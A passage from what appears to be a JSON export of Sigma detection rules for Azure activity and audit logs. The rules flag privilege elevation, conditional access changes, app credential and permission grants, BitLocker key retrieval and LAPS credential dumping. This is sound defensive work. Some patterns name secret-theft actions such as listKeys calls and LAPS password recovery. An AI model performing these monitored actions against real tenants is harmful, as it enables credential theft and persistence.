whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_network_virtual_device_modified_or_deleted.yml",
    "content": "title: Azure Virtual Network Device Modified or Deleted\nid: 15ef3fac-f0f0-4dc4-ada0-660aa72980b3\nstatus: test\ndescription: |\n    Identifies when a virtual network device is being modified or deleted.\n    This can be a network interface, network virtual appliance, virtual hub, or virtual router.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer @austinsonger\ndate: 2021-08-08\nmodified: 2022-08-23\ntags:\n    - attack.impact\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/WRITE\n            - MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/DELETE\n            - MICROSOFT.NETWORK/NETWORKINTERFACES/WRITE\n            - MICROSOFT.NETWORK/NETWORKINTERFACES/JOIN/ACTION\n            - MICROSOFT.NETWORK/NETWORKINTERFACES/DELETE\n            - MICROSOFT.NETWORK/NETWORKVIRTUALAPPLIANCES/DELETE\n            - MICROSOFT.NETWORK/NETWORKVIRTUALAPPLIANCES/WRITE\n            - MICROSOFT.NETWORK/VIRTUALHUBS/DELETE\n            - MICROSOFT.NETWORK/VIRTUALHUBS/WRITE\n            - MICROSOFT.NETWORK/VIRTUALROUTERS/WRITE\n            - MICROSOFT.NETWORK/VIRTUALROUTERS/DELETE\n    condition: selection\nfalsepositives:\n    - Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_new_cloudshell_created.yml",
    "content": "title: Azure New CloudShell Created\nid: 72af37e2-ec32-47dc-992b-bc288a2708cb\nstatus: test\ndescription: Identifies when a new cloudshell is created inside of Azure portal.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer\ndate: 2021-09-21\nmodified: 2022-08-23\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName: MICROSOFT.PORTAL/CONSOLES/WRITE\n    condition: selection\nfalsepositives:\n    - A new cloudshell may be created by a system administrator.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_owner_removed_from_application_or_service_principal.yml",
    "content": "title: Azure Owner Removed From Application or Service Principal\nid: 636e30d5-3736-42ea-96b1-e6e2f8429fd6\nstatus: test\ndescription: Identifies when a owner is was removed from a application or service principal in Azure.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy\nauthor: Austin Songer @austinsonger\ndate: 2021-09-03\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        properties.message:\n            - Remove owner from service principal\n            - Remove owner from application\n    condition: selection\nfalsepositives:\n    - Owner being removed may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Owner removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_rare_operations.yml",
    "content": "title: Rare Subscription-level Operations In Azure\nid: c1182e02-49a3-481c-b3de-0fadc4091488\nstatus: test\ndescription: Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.\nreferences:\n    - https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml\nauthor: sawwinnnaung\ndate: 2020-05-07\nmodified: 2023-10-11\ntags:\n    - attack.t1003\n    - attack.credential-access\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    keywords:\n        - Microsoft.DocumentDB/databaseAccounts/listKeys/action\n        - Microsoft.Maps/accounts/listKeys/action\n        - Microsoft.Media/mediaservices/listKeys/action\n        - Microsoft.CognitiveServices/accounts/listKeys/action\n        - Microsoft.Storage/storageAccounts/listKeys/action\n        - Microsoft.Compute/snapshots/write\n        - Microsoft.Network/networkSecurityGroups/write\n    condition: keywords\nfalsepositives:\n    - Valid change\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_service_principal_created.yml",
    "content": "title: Azure Service Principal Created\nid: 0ddcff6d-d262-40b0-804b-80eb592de8e3\nstatus: test\ndescription: Identifies when a service principal is created in Azure.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy\nauthor: Austin Songer @austinsonger\ndate: 2021-09-02\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        properties.message: 'Add service principal'\n    condition: selection\nfalsepositives:\n    - Service principal being created may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_service_principal_removed.yml",
    "content": "title: Azure Service Principal Removed\nid: 448fd1ea-2116-4c62-9cde-a92d120e0f08\nstatus: test\ndescription: Identifies when a service principal was removed in Azure.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy\nauthor: Austin Songer @austinsonger\ndate: 2021-09-03\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        properties.message: Remove service principal\n    condition: selection\nfalsepositives:\n    - Service principal being removed may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_subscription_permissions_elevation_via_activitylogs.yml",
    "content": "title: Azure Subscription Permission Elevation Via ActivityLogs\nid: 09438caa-07b1-4870-8405-1dbafe3dad95\nstatus: test\ndescription: |\n    Detects when a user has been elevated to manage all Azure Subscriptions.\n    This change should be investigated immediately if it isn't planned.\n    This setting could allow an attacker access to Azure subscriptions in your environment.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization\nauthor: Austin Songer @austinsonger\ndate: 2021-11-26\nmodified: 2022-08-23\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName: MICROSOFT.AUTHORIZATION/ELEVATEACCESS/ACTION\n    condition: selection\nfalsepositives:\n    - If this was approved by System Administrator.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_suppression_rule_created.yml",
    "content": "title: Azure Suppression Rule Created\nid: 92cc3e5d-eb57-419d-8c16-5c63f325a401\nstatus: test\ndescription: Identifies when a suppression rule is created in Azure. Adversary's could attempt this to evade detection.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer\ndate: 2021-08-16\nmodified: 2022-08-23\ntags:\n    - attack.impact\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName: MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES/WRITE\n    condition: selection\nfalsepositives:\n    - Suppression Rule being created may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_virtual_network_modified_or_deleted.yml",
    "content": "title: Azure Virtual Network Modified or Deleted\nid: bcfcc962-0e4a-4fd9-84bb-a833e672df3f\nstatus: test\ndescription: Identifies when a Virtual Network is modified or deleted in Azure.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer @austinsonger\ndate: 2021-08-08\nmodified: 2022-08-23\ntags:\n    - attack.impact\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName|startswith:\n            - MICROSOFT.NETWORK/VIRTUALNETWORKGATEWAYS/\n            - MICROSOFT.NETWORK/VIRTUALNETWORKS/\n        operationName|endswith:\n            - /WRITE\n            - /DELETE\n    condition: selection\nfalsepositives:\n    - Virtual Network being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_vpn_connection_modified_or_deleted.yml",
    "content": "title: Azure VPN Connection Modified or Deleted\nid: 61171ffc-d79c-4ae5-8e10-9323dba19cd3\nstatus: test\ndescription: Identifies when a VPN connection is modified or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer @austinsonger\ndate: 2021-08-08\nmodified: 2022-08-23\ntags:\n    - attack.impact\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/WRITE\n            - MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/DELETE\n    condition: selection\nfalsepositives:\n    - VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_aad_secops_ca_policy_removedby_bad_actor.yml",
    "content": "title: CA Policy Removed by Non Approved Actor\nid: 26e7c5e2-6545-481e-b7e6-050143459635\nstatus: test\ndescription: Monitor and alert on conditional access changes where non approved actor removed CA Policy.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access\nauthor: Corissa Koopmans, '@corissalea'\ndate: 2022-07-19\ntags:\n    - attack.privilege-escalation\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1548\n    - attack.t1556\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Delete conditional access policy\n    condition: selection\nfalsepositives:\n    - Misconfigured role permissions\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_aad_secops_ca_policy_updatedby_bad_actor.yml",
    "content": "title: CA Policy Updated by Non Approved Actor\nid: 50a3c7aa-ec29-44a4-92c1-fce229eef6fc\nstatus: test\ndescription: Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare \"old\" vs \"new\" value.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access\nauthor: Corissa Koopmans, '@corissalea'\ndate: 2022-07-19\nmodified: 2024-05-28\ntags:\n    - attack.privilege-escalation\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1548\n    - attack.t1556\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Update conditional access policy\n    condition: selection\nfalsepositives:\n    - Misconfigured role permissions\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml",
    "content": "title: New CA Policy by Non-approved Actor\nid: 0922467f-db53-4348-b7bf-dee8d0d348c6\nstatus: test\ndescription: Monitor and alert on conditional access changes.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure\nauthor: Corissa Koopmans, '@corissalea'\ndate: 2022-07-18\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Add conditional access policy\n    condition: selection\nfalsepositives:\n    - Misconfigured role permissions\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_ad_account_created_deleted.yml",
    "content": "title: Account Created And Deleted Within A Close Time Frame\nid: 6f583da0-3a90-4566-a4ed-83c09fe18bbf\nstatus: test\ndescription: Detects when an account was created and deleted in a short period of time.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#short-lived-accounts\nauthor: Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton\ndate: 2022-08-11\nmodified: 2022-08-18\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message:\n            - Add user\n            - Delete user\n        Status: Success\n    condition: selection\nfalsepositives:\n    - Legit administrative action\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_ad_bitlocker_key_retrieval.yml",
    "content": "title: Bitlocker Key Retrieval\nid: a0413867-daf3-43dd-9245-734b3a787942\nstatus: test\ndescription: Monitor and alert for Bitlocker key retrieval.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#bitlocker-key-retrieval\nauthor: Michael Epping, '@mepples21'\ndate: 2022-06-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        Category: KeyManagement\n        OperationName: Read BitLocker key\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_ad_certificate_based_authencation_enabled.yml",
    "content": "title: Certificate-Based Authentication Enabled\nid: c2496b41-16a9-4016-a776-b23f8910dc58\nstatus: test\ndescription: Detects when certificate based authentication has been enabled in an Azure Active Directory tenant.\nreferences:\n    - https://posts.specterops.io/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f\n    - https://goodworkaround.com/2022/02/15/digging-into-azure-ad-certificate-based-authentication/\nauthor: Harjot Shah Singh, '@cyb3rjy0t'\ndate: 2024-03-26\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1556\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        OperationName: 'Authentication Methods Policy Update'\n        TargetResources.modifiedProperties|contains: 'AuthenticationMethodsPolicy'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_ad_device_registration_policy_changes.yml",
    "content": "title: Changes to Device Registration Policy\nid: 9494bff8-959f-4440-bbce-fb87a208d517\nstatus: test\ndescription: Monitor and alert for changes to the device registration policy.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-registrations-and-joins-outside-policy\nauthor: Michael Epping, '@mepples21'\ndate: 2022-06-28\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1484\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        Category: 'Policy'\n        ActivityDisplayName: 'Set device registration policies'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml",
    "content": "title: Guest Users Invited To Tenant By Non Approved Inviters\nid: 4ad97bf5-a514-41a4-abd3-4f3455ad4865\nstatus: test\ndescription: Detects guest users being invited to tenant by non-approved inviters\nreferences:\n    - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins\nauthor: MikeDuddington, '@dudders1'\ndate: 2022-07-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        Category: 'UserManagement'\n        OperationName: 'Invite external user'\n    filter:\n        InitiatedBy|contains: '<approved guest inviter use OR for multiple>'\n    condition: selection and not filter\nfalsepositives:\n    - If this was approved by System Administrator.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_ad_new_root_ca_added.yml",
    "content": "title: New Root Certificate Authority Added\nid: 4bb80281-3756-4ec8-a88e-523c5a6fda9e\nstatus: test\ndescription: Detects newly added root certificate authority to an AzureAD tenant to support certificate based authentication.\nreferences:\n    - https://posts.specterops.io/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f\n    - https://goodworkaround.com/2022/02/15/digging-into-azure-ad-certificate-based-authentication/\nauthor: Harjot Shah Singh, '@cyb3rjy0t'\ndate: 2024-03-26\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1556\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        OperationName: 'Set Company Information'\n        TargetResources.modifiedProperties.newValue|contains: 'TrustedCAsForPasswordlessAuth'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_ad_users_added_to_device_admin_roles.yml",
    "content": "title: Users Added to Global or Device Admin Roles\nid: 11c767ae-500b-423b-bae3-b234450736ed\nstatus: test\ndescription: Monitor and alert for users added to device admin roles.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-administrator-roles\nauthor: Michael Epping, '@mepples21'\ndate: 2022-06-28\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        Category: RoleManagement\n        OperationName|contains|all:\n            - 'Add'\n            - 'member to role'\n        TargetResources|contains:\n            - '7698a772-787b-4ac8-901f-60d6b08affd2'\n            - '62e90394-69f5-4237-9190-012177145e10'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_app_appid_uri_changes.yml",
    "content": "title: Application AppID Uri Configuration Changes\nid: 1b45b0d1-773f-4f23-aedc-814b759563b1\nstatus: test\ndescription: Detects when a configuration change is made to an applications AppID URI.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#appid-uri-added-modified-or-removed\nauthor: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'\ndate: 2022-06-02\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.credential-access\n    - attack.privilege-escalation\n    - attack.t1552\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message:\n            - Update Application\n            - Update Service principal\n    condition: selection\nfalsepositives:\n    - When and administrator is making legitimate AppID URI configuration changes to an application. This should be a planned event.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_app_credential_added.yml",
    "content": "title: Added Credentials to Existing Application\nid: cbb67ecc-fb70-4467-9350-c910bdf7c628\nstatus: test\ndescription: Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-credentials\nauthor: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'\ndate: 2022-05-26\nmodified: 2025-07-18\ntags:\n    - attack.privilege-escalation\n    - attack.t1098.001\n    - attack.persistence\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message:\n            - Update application – Certificates and secrets management\n            - Update Service principal/Update Application\n    condition: selection\nfalsepositives:\n    - When credentials are added/removed as part of the normal working hours/workflows\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_app_delegated_permissions_all_users.yml",
    "content": "title: Delegated Permissions Granted For All Users\nid: a6355fbe-f36f-45d8-8efc-ab42465cbc52\nstatus: test\ndescription: Detects when highly privileged delegated permissions are granted on behalf of all users\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions\nauthor: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'\ndate: 2022-07-28\ntags:\n    - attack.credential-access\n    - attack.t1528\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Add delegated permission grant\n    condition: selection\nfalsepositives:\n    - When the permission is legitimately needed for the app\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_app_end_user_consent.yml",
    "content": "title: End User Consent\nid: 9b2cc4c4-2ad4-416d-8e8e-ee6aa6f5035a\nstatus: test\ndescription: Detects when an end user consents to an application\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#end-user-consent\nauthor: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'\ndate: 2022-07-28\ntags:\n    - attack.credential-access\n    - attack.t1528\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        ConsentContext.IsAdminConsent: 'false'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_app_end_user_consent_blocked.yml",
    "content": "title: End User Consent Blocked\nid: 7091372f-623c-4293-bc37-20c32b3492be\nstatus: test\ndescription: Detects when end user consent is blocked due to risk-based consent.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#end-user-stopped-due-to-risk-based-consent\nauthor: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'\ndate: 2022-07-10\ntags:\n    - attack.credential-access\n    - attack.t1528\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        failure_status_reason: 'Microsoft.online.Security.userConsentBlockedForRiskyAppsExceptions'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_app_owner_added.yml",
    "content": "title: Added Owner To Application\nid: 74298991-9fc4-460e-a92e-511aa60baec1\nstatus: test\ndescription: Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#new-owner\nauthor: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'\ndate: 2022-06-02\ntags:\n    - attack.t1552\n    - attack.credential-access\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Add owner to application\n    condition: selection\nfalsepositives:\n    - When a new application owner is added by an administrator\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_app_permissions_msft.yml",
    "content": "title: App Granted Microsoft Permissions\nid: c1d147ae-a951-48e5-8b41-dcd0170c7213\nstatus: test\ndescription: Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions\nauthor: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'\ndate: 2022-07-10\ntags:\n    - attack.credential-access\n    - attack.t1528\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message:\n            - Add delegated permission grant\n            - Add app role assignment to service principal\n    condition: selection\nfalsepositives:\n    - When the permission is legitimately needed for the app\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_app_privileged_permissions.yml",
    "content": "title: App Granted Privileged Delegated Or App Permissions\nid: 5aecf3d5-f8a0-48e7-99be-3a759df7358f\nrelated:\n    - id: ba2a7c80-027b-460f-92e2-57d113897dbc\n      type: obsolete\nstatus: test\ndescription: Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions\nauthor: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'\ndate: 2022-07-28\nmodified: 2023-03-29\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1098.003\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Add app role assignment to service principal\n    condition: selection\nfalsepositives:\n    - When the permission is legitimately needed for the app\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_app_role_added.yml",
    "content": "title: App Assigned To Azure RBAC/Microsoft Entra Role\nid: b04934b2-0a68-4845-8a19-bdfed3a68a7a\nstatus: test\ndescription: Detects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#service-principal-assigned-to-a-role\nauthor: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'\ndate: 2022-07-19\nmodified: 2024-11-04\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1098.003\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        targetResources.type: 'Service Principal'\n        properties.message:\n            - Add member to role\n            - Add eligible member to role\n            - Add scoped member to role\n    condition: selection\nfalsepositives:\n    - When the permission is legitimately needed for the app\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_app_uri_modifications.yml",
    "content": "title: Application URI Configuration Changes\nid: 0055ad1f-be85-4798-83cf-a6da17c993b3\nstatus: test\ndescription: |\n    Detects when a configuration change is made to an applications URI.\n    URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-configuration-changes\nauthor: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'\ndate: 2022-06-02\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1528\n    - attack.t1078.004\n    - attack.persistence\n    - attack.credential-access\n    - attack.privilege-escalation\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Update Application Sucess- Property Name AppAddress\n    condition: selection\nfalsepositives:\n    - When and administrator is making legitimate URI configuration changes to an application. This should be a planned event.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_auditlogs_laps_credential_dumping.yml",
    "content": "title: Windows LAPS Credential Dump From Entra ID\nid: a4b25073-8947-489c-a8dd-93b41c23f26d\nstatus: test\ndescription: Detects when an account dumps the LAPS password from Entra ID.\nreferences:\n    - https://twitter.com/NathanMcNulty/status/1785051227568632263\n    - https://www.cloudcoffee.ch/microsoft-365/configure-windows-laps-in-microsoft-intune/\n    - https://techcommunity.microsoft.com/t5/microsoft-entra-blog/introducing-windows-local-administrator-password-solution-with/ba-p/1942487\nauthor: andrewdanis\ndate: 2024-06-26\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098.005\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        category: 'Device'\n        activityType|contains: 'Recover device local administrator password'\n        additionalDetails.additionalInfo|contains: 'Successfully recovered local credential by device id'\n    condition: selection\nfalsepositives:\n    - Approved activity performed by an Administrator.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_change_to_authentication_method.yml",
    "content": "title: Change to Authentication Method\nid: 4d78a000-ab52-4564-88a5-7ab5242b20c7\nstatus: test\ndescription: Change to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts\nauthor: AlertIQ\ndate: 2021-10-10\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.credential-access\n    - attack.t1556\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1098\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        LoggedByService: 'Authentication Methods'\n        Category: 'UserManagement'\n        OperationName: 'User registered security info'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_federation_modified.yml",
